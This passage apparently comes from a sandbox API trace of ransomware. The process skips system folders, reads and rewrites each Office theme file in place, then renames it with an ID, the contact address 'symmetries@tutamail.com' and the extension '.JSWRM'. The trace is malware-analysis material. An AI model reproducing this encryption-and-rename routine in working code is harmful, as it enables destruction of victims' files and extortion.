hHeap=0x1e0000) returned 1 [0100.745] CloseHandle (hObject=0x314) returned 1 [0100.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0100.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0100.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0100.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0100.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0100.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0100.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0100.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0100.746] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Frosted Glass.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\frosted glass.eftx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Frosted Glass.eftx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\frosted glass.eftx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0100.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0100.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0100.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0100.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0100.747] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1139e160, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1139e160, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1145cd4f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x51cbe, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Glossy.eftx", cAlternateFileName="GLOSSY~1.EFT")) returned 1 [0100.747] lstrcmpiW (lpString1="Glossy.eftx", lpString2=".") returned 1 [0100.747] lstrcmpiW (lpString1="Glossy.eftx", lpString2="..") returned 1 [0100.747] lstrcmpiW (lpString1="Glossy.eftx", lpString2="...") returned 1 [0100.747] lstrcmpiW (lpString1="Glossy.eftx", lpString2="windows") returned -1 [0100.747] lstrcmpiW (lpString1="Glossy.eftx", lpString2="recovery") returned -1 [0100.747] lstrcmpiW (lpString1="Glossy.eftx", lpString2="perflogs") returned -1 [0100.747] lstrcmpiW (lpString1="Glossy.eftx", lpString2="documents and settings") returned 1 [0100.747] lstrcmpiW (lpString1="Glossy.eftx", lpString2="$RECYCLE.BIN") returned 1 [0100.747] lstrcmpiW (lpString1="Glossy.eftx", lpString2="system volume information") returned -1 [0100.747] lstrcmpiW (lpString1="Glossy.eftx", lpString2="msocache") returned -1 [0100.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0100.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Glossy.eftx", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Glossy.eftx", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Glossy.eftx", lpUsedDefaultChar=0x0) returned 11 [0100.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0100.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0100.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Glossy.eftx", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Glossy.eftx", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Glossy.eftx", lpUsedDefaultChar=0x0) returned 11 [0100.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0100.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0100.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0100.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0100.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Glossy.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\glossy.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.748] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=335038) returned 1 [0100.748] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0100.748] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0100.761] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.761] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0100.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.762] CloseHandle (hObject=0x314) returned 1 [0100.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0100.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0100.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0100.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0100.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0100.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0100.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.762] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Glossy.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\glossy.eftx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Glossy.eftx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\glossy.eftx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0100.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0100.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0100.764] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11482f7f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11482f7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd44b, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Glow Edge.eftx", cAlternateFileName="GLOWED~1.EFT")) returned 1 [0100.764] lstrcmpiW (lpString1="Glow Edge.eftx", lpString2=".") returned 1 [0100.764] lstrcmpiW (lpString1="Glow Edge.eftx", lpString2="..") returned 1 [0100.764] lstrcmpiW (lpString1="Glow Edge.eftx", lpString2="...") returned 1 [0100.764] lstrcmpiW (lpString1="Glow Edge.eftx", lpString2="windows") returned -1 [0100.764] lstrcmpiW (lpString1="Glow Edge.eftx", lpString2="recovery") returned -1 [0100.764] lstrcmpiW (lpString1="Glow Edge.eftx", lpString2="perflogs") returned -1 [0100.764] lstrcmpiW (lpString1="Glow Edge.eftx", lpString2="documents and settings") returned 1 [0100.764] lstrcmpiW (lpString1="Glow Edge.eftx", lpString2="$RECYCLE.BIN") returned 1 [0100.764] lstrcmpiW (lpString1="Glow Edge.eftx", lpString2="system volume information") returned -1 [0100.764] lstrcmpiW (lpString1="Glow Edge.eftx", lpString2="msocache") returned -1 [0100.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0100.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Glow Edge.eftx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Glow Edge.eftx", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Glow Edge.eftx", lpUsedDefaultChar=0x0) returned 14 [0100.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0100.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0100.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Glow Edge.eftx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Glow Edge.eftx", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Glow Edge.eftx", lpUsedDefaultChar=0x0) returned 14 [0100.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0100.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0100.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0100.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0100.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Glow Edge.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\glow edge.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.766] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=54347) returned 1 [0100.766] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd440) returned 0x24d210 [0100.766] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xd440, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xd440, lpOverlapped=0x0) returned 1 [0100.771] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.771] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xd440, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xd440, lpOverlapped=0x0) returned 1 [0100.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.771] CloseHandle (hObject=0x314) returned 1 [0100.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0100.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0100.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0100.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0100.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0100.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0100.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0100.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0100.772] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Glow Edge.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\glow edge.eftx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Glow Edge.eftx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\glow edge.eftx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0100.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0100.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0100.773] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11436ace, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11436ace, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11436ace, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x56208, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Grunge Texture.eftx", cAlternateFileName="GRUNGE~1.EFT")) returned 1 [0100.773] lstrcmpiW (lpString1="Grunge Texture.eftx", lpString2=".") returned 1 [0100.773] lstrcmpiW (lpString1="Grunge Texture.eftx", lpString2="..") returned 1 [0100.773] lstrcmpiW (lpString1="Grunge Texture.eftx", lpString2="...") returned 1 [0100.773] lstrcmpiW (lpString1="Grunge Texture.eftx", lpString2="windows") returned -1 [0100.773] lstrcmpiW (lpString1="Grunge Texture.eftx", lpString2="recovery") returned -1 [0100.773] lstrcmpiW (lpString1="Grunge Texture.eftx", lpString2="perflogs") returned -1 [0100.773] lstrcmpiW (lpString1="Grunge Texture.eftx", lpString2="documents and settings") returned 1 [0100.773] lstrcmpiW (lpString1="Grunge Texture.eftx", lpString2="$RECYCLE.BIN") returned 1 [0100.773] lstrcmpiW (lpString1="Grunge Texture.eftx", lpString2="system volume information") returned -1 [0100.773] lstrcmpiW (lpString1="Grunge Texture.eftx", lpString2="msocache") returned -1 [0100.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0100.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grunge Texture.eftx", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0100.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grunge Texture.eftx", cchWideChar=19, lpMultiByteStr=0x240f70, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Grunge Texture.eftx", lpUsedDefaultChar=0x0) returned 19 [0100.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0100.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grunge Texture.eftx", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0100.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grunge Texture.eftx", cchWideChar=19, lpMultiByteStr=0x2412b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Grunge Texture.eftx", lpUsedDefaultChar=0x0) returned 19 [0100.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0100.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0100.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0100.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Grunge Texture.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\grunge texture.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.774] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=352776) returned 1 [0100.774] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0100.774] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0100.794] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.794] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0100.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.795] CloseHandle (hObject=0x314) returned 1 [0100.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0100.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0100.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0100.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0100.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 